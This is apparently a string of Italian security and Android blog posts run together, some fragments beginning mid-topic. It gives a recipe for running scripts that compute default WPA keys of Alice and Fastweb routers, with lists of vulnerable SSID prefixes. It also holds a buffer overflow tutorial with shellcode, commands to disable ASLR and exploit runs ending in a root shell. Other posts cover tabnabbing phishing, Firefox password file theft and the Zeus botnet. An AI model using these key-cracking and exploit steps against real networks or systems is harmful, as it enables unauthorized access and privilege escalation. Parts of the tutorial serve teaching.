ROFL!

Tra le varie cose, mi ero promesso di scrivere due semplici script per il calcolo della WPA di default di Alice e Fastweb compatibili per il mio Android in modo da avere un piccolo coltellino svizzero sempre con me. In precedenza avevo codato qualcosa, ma visti i numerosi script ormai reperibilissimi in rete non vedo perchè non pubblicare una versione compatibile per Android qui.

Requisiti

Per far funzionare al meglio i miei script è necessario avere:

• Accesso root link link – indispensabile per cambiare i permessi ai file
• Adb funzionante link link – indispensabile per i trasferimenti dei file
• ConnectBot link – disponibile nel Market
• Astro File Manager link – disponibile nel Market

Configurazione

Una volta preparato l’ambiente è necessario installare sul mobile busybox, bc, e la bash. Android lavora su architettura ARM sono quindi necessari binary compilati per questi sistemi embedded:

• Busybox link
• Bc link
• Bash link

Dopo averli scaricati, collegate il mobile in “Debug mode” al pc, collocatevi nella directory di adb e procedete con questa serie di comandi:

adb remount
adb push busybox /data
adb push bc /data
adb push bash
adb shell
mount -o remount,rw -t yaffs2 /dev/block/mtdblock4 /system
mkdir /system/xbin
cat /data/busybox > /system/xbin/busybox
chmod 755 /system/xbin/busybox
busybox --install /system/xbin
cat /data/bc > /system/bin/bc
chmod 755 /system/bin/bc
cat /data/bash > /system/bin/bash
chmod 755 /system/bin/bash
mount -o ro,remount -t yaffs2 /dev/block/mtdblock4 /system
sync
reboot

Prima di utilizzare gli script bisogna considerare che non tutti i router sono vulnerabili ma attualmente solo quelli con il SSID mostrati nelle due liste:

FASTWEB-*-000827*
FASTWEB-*-0013C8*
FASTWEB-*-0017C2*
FASTWEB-*-00193E*
FASTWEB-*-001CA2*
FASTWEB-*-001D8B*
FASTWEB-*-002233*
FASTWEB-*-00238E*
FASTWEB-*-002553*

Alice-46*
Alice-48*
Alice-54*
Alice-55*
Alice-56*
Alice-93*
Alice-96*

A questo punto scaricate gli script e caricateli nel mobile.

• Fastweb script
• Alice script

adb remount
adb push fast /sdcard
adb push alice /sdcard

Utilizzo

Prendete il mobile e con l’applicazione Astro aprite lo script per modificate gli input: la variabile ssid e mac nel caso di Alice, la variabile input nel caso di Fastweb.

Dopo di che utilizzate ConnectBot per avere una shell in Android e per lanciare gli script digitate questi comandi:

su
cd /sdcard
bash fast
bash alice

Demo

Enjoy.

Disclaimer: Non mi retengo in nessun modo responsabile per le informazioni descritte in questo articolo e per l’uso che ne vogliate fare.

Tuttavia mi piace condividere anche quest’altra interessante presentazione su SHODAN, un motore di ricerca per computer e server. SHODAN permette di scovare in Internet devices come router, switch, server web… insomma un bel patrimonio di risorse! Molto intriganti sono i case study di cui uno relativo a Cisco e molto simile a quello che avevo discusso qui.

SHODAN for Penetration Testers (DEFCON 18)

A presto!

Le principali novità che ho potuto apprezzare fin da subito sono:

- Multitouch perfettamente funzionante;
- Integrazione con Picasa;
- Backup dei contatti in automatico;
- 5 Desktop;
- Bluetooth finalmente funzionante;
- Menù migliorato molto più bello da vedere.

Unica nota dolente probabilmente sarà la batteria, infatti Eclair (Android 2.1) consuma leggermente di più rispetto a Donut (Android 1.6). Tuttavia l’aggiornamento è d’obbligo e vediamo come fare.

Installazione di Eclair Android 2.1

L’upgrade alla versione 2.1 non è una operazione complicata! Quindi non spaventatevi.
Per prima cosa è necessario recuperare la Rom direttamente dal sito ufficiale dell’Acer. Una volta decompresso il pacchetto sarà sufficiente lanciare il setup.exe presente all’interno della cartella EUU_Acer_LiquidE_1.100.39_EMEA-GEN1_04.02.02.
Mi raccomando fino a questo punto non collegate il telefono all’usb del pc, bensì attendete il momento in cui ve lo sarà chiesto, come mostrato nell’immagine, a quel punto allora collegatelo.

Una volta premuto “Avanti” non dovete far altro che attendere la conclusione della procedura di reflash. Il telefono effettuerà un reboot con Eclair Android 2.1 pronto per essere utilizzato.

Problema sul riconoscimento della versione precedente

Se come me partivate con una Rom Acer_liquid_1.002.03_EMEA_GEN1 (Impostazioni -> Info sul Telefono -> Numero Build) e l’utility dell’Acer non vi ha riconosciuto la versione precedente non consentendovi di procedere, allora è necessario fare qualche passaggio in più.

Scaricatevi questo Acer Tool e questa Build. Scompattate il pacchetto e lanciate ACER Download Tool [Single].exe che trovate all’interno della directory principale. Collegate il telefonino e selezionate con l’Acer Tool la build appena scaricata. Cliccate su Start e non scollegate l’usb fino al termine dalla procedura.

Se tutto è andato per il verso giusto il telefono reboota con Eclair Android 2.1. A questo punto potete tenervi questa build oppure rifare il primo passaggio utilizzando quella ufficiale visto che ora l’utility dell’Acer riconosce la versione precedente.

Fonte:
Tutte queste info le ho recuperate dall’ottimo forum di batista70. Scopo di questo post è stato quello di sintetizzare i concetti principali elencati in questo thread. Da segnalare anche la Rom non ufficiale b70p 2.0 sicuramente da testare visto l’interessante video di presentazione.

Alla prossima!

Bene. Allora questo articolo fa per voi!

Infatti un web design americano Aza Raskin ha recentemente pubblicato una nuova tipologia di phishing: il Tabnabbing.

Questa nuova tecnica di attacco sfrutta proprio questa caratteristica comune a molti di tenere aperte centinaia di tab. Nello specifico consiste in un file Javascript dove si imposta un redirect nel momento in cui l’utente seleziona altre tab aperte. Dunque punta a sfruttare l’attimo di distrazione da parte del navigatore impegnato a leggere altre pagine.

Infatti nel sito dove viene descritta questa tecnica è presente anche una demo: se lo avete aperto in un nuovo tab e poi siete ritornati qui per leggere il resto dell’articolo sicuramente noterete che è stato fatto un redirect ad una pagina contente l’immagine di login di gmail.

Semplice ma efficace!

C’è anche un video che illustra bene quello che succede.

A New Type of Phishing Attack from Aza Raskin on Vimeo.

Forte vero?
Alla prossima!

Occhio ragazzi! Se siete come me, ossia un utilizzatore abituale di firefox, state attenti a non farvi rubare questi due file localizzati nella directory dell’utente di Mozilla:

• key3.db
• signons.sqlite

Ecco cosa potrebbe capitare:

In questo modo anche la vostra ragazza potrebbe farvela!

Dovendo spiegare a persone che di informatica non ne masticano, a maggior ragione di sicurezza, presi il videoproiettore e con la frase “Ecco questa è una botnet…” mostrai la seguente immagine:

Si tratta infatti di una immagine estrapolata dal sito ZeusTracker che mostra in tempo reale le macchine infette nel mondo. Ora non è compito di questo articolo spiegarvi cosa sia una botnet perchè di materiale in rete ve ne è fin troppo. Quello che mi preme condividere sono le informazioni presenti in ZeusTracker.

Oltre a fornire una rapida overview della situazione, c’è una blocklist sia di IP che Domain da poter scaricare e caricare nel proprio firewall/proxy. Inoltre nel caso in cui dobbiate fare un’analisi sulle botnet potreste prendere Zeus come esempio e recuperare i dati nella pagina delle statistiche.

Attualmente la botnet presenta un numero di “nuovi” host al mese superiore a 300:

con un totale di circa 1410 macchine infettate:

con i C&C hostati su domini di provenienza cinese, russa e americana:

e infine non potevano mancare gli ultimi arrivi:

Peccato che non ci sia il costo per l’affitto!! Comunque non disperiamo… con 200 € compriamo direttamente i sorgenti:

Non sarà del calibro di Zeus ma va bene lo stesso!
[spero che vi siate fatti una risata qui.]

Vi lascio con un simpatico video su una investigazione fatta dalla BBC nel Marzo 2009:

Alla prossima!

Dopo l’articolo sulle basi dell’assembly e del debugging, vediamo in questo come implementare la tecnica del buffer overflow.

Senza perderci troppo sulla teoria che rimando a wikipedia, cerchiamo di sfruttare un codice vulnerabile per ottenere la shell di root.

Innanzitutto se utilizziamo un kernel superiore al 2.4 è necessario disattivare la randomizzazione dello stack:

# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0

Per riabilitarlo invece:

root@bt:~# sysctl -w kernel.randomize_va_space=3

vuln.c

int main(int argc, char **argv){
          char buf[8];
          strcpy(buf, argv[1]);
          printf("Hello %s\n", buf);
}

Compiliamo:

# gcc -o vuln vuln.c -z execstack -fno-stack-protector -mpreferred-stack-boundary=2
vuln.c: In function ‘main’:
vuln.c:3: warning: incompatible implicit declaration of built-in function ‘strcpy’
vuln.c:4: warning: incompatible implicit declaration of built-in function ‘printf’

Ricordiamoci di utilizzare le opzioni -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 per il kernel 2.6.x e settiamo il suid:

#chmod +s vuln

Procuriamoci uno shellcode da shellcode.org testiamo il suo funzionamento:

char main[] =
     "\xeb\x19\x5e\xb0\x46\x31\xdb\x31"
     "\xc9\xcd\x80\x31\xc0\xb0\x0b\x89"
     "\xf3\x31\xff\x57\x56\x89\xe1\x31"
     "\xd2\xcd\x80\xe8\xe2\xff\xff\xff"
     "/bin/sh";

Testiamo il suo corretto funzionamento:

root@bt:# gcc -o shellcode shellcode.c
root@bt:# ./shellcode
#

Bene ora possiamo esportare il tutto in una variabile d’ambiente aggiungendo anche del nop code.

user@bt$ export SH=`perl -e 'print "\x90"x64,"\xeb\x1d\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x8d\x4e\x08\x8d\x56\x0c\x89\xf3\xb0\x0b\xcd\x80\x40\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"'`

Ora non ci resta che individuare dove è localizzata la variabile d’ambiente appena creata.

get.c

int main(int argc, char *argv[])
{
          printf("The address of %s is %p\n",argv[1], getenv(argv[1]));
          return 0;
}

Compiliamo e cerchiamo l’indirizzo della variabile d’ambiente:

user@$ ./get SH
The address of SH is 0xbffffed4

Ora possimao lanciare l’exploit sull’indirizzo appena trovato:

user@bt$ ./get SH
The address of SH is 0xbffffed4
user@bt:/root/Downloads/BOF_hakin9$ ./vuln `perl -e 'print "\xd4\xfe\xff\xbf"x4'`
Hello ����������������
# whoami
root

Possiamo fare anche la stessa cosa senza utilizzare una variabile d’ambiente e shellcode, ma cercando il binario direttamente nella memoria.

find.c

#include <stdio.h>
#include <stdlib.h>
#define BASE_ADDR    0xb7e7d000
int main(){
           char *ptr=BASE_ADDR;
           while(1){
                     if((strncmp(ptr,"/bin/sh",7))==0){
                                printf("%p : %s\n",ptr,ptr);
                                return 0;
                     }
                     ptr++;
           }
}

Compiliamo con le stesse opzioni adottatte per vuln.c

Analizziamo lo stack address:

user@bt$ gdb -q vuln
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) run
Starting program: /vuln
 
Breakpoint 1, 0x080483fa in main ()
Current language:  auto; currently asm
(gdb) x/x system
0xb7ea7a90 <system>:    0x890cec83
(gdb) q
The program is running.  Exit anyway? (y or n) y

Nel caso in cui avessimo uno stack dinamico, l’indirizzo 0xb7ea7a90 cambierebbe ogni volta.

Cerchiamo la nostra shell in memoria:

user@bt$ ./find
0xb7faab33 : /bin/sh

Bene ora non ci resta che lanciare l’exploit:

user@bt$ ./vuln `printf "aaaabbbbcccc\x90\x7a\xea\xb7aaaa\x33\xab\xfa\xb7"`
Hello aaaabbbbcccc�z��aaaa3���
# whoami
root

Questo articolo ha il solo scopo didattico, infatti con l’utilizzo di kernel aggiornati potrebbero verificarsi errori e/o Segmentation Fault.

Ottimo video realizzato da Stefano Quintarelli che illustra in modo molto esplicativo lo stato della fibra ottica in Italia. Da vedere assolutamente!!!

Fonte: AreaNetworking

A lavoro terminato esportiamo cliccando su Export Multple dal menù File. Selezioniamo l’estensione, nel mio caso ho utilizzato AIFF e la directory di destinazione. Infine apriamo iTunes creiamo una nuova playlist, copiamo i file appena divisi e masterizziamo.

A presto.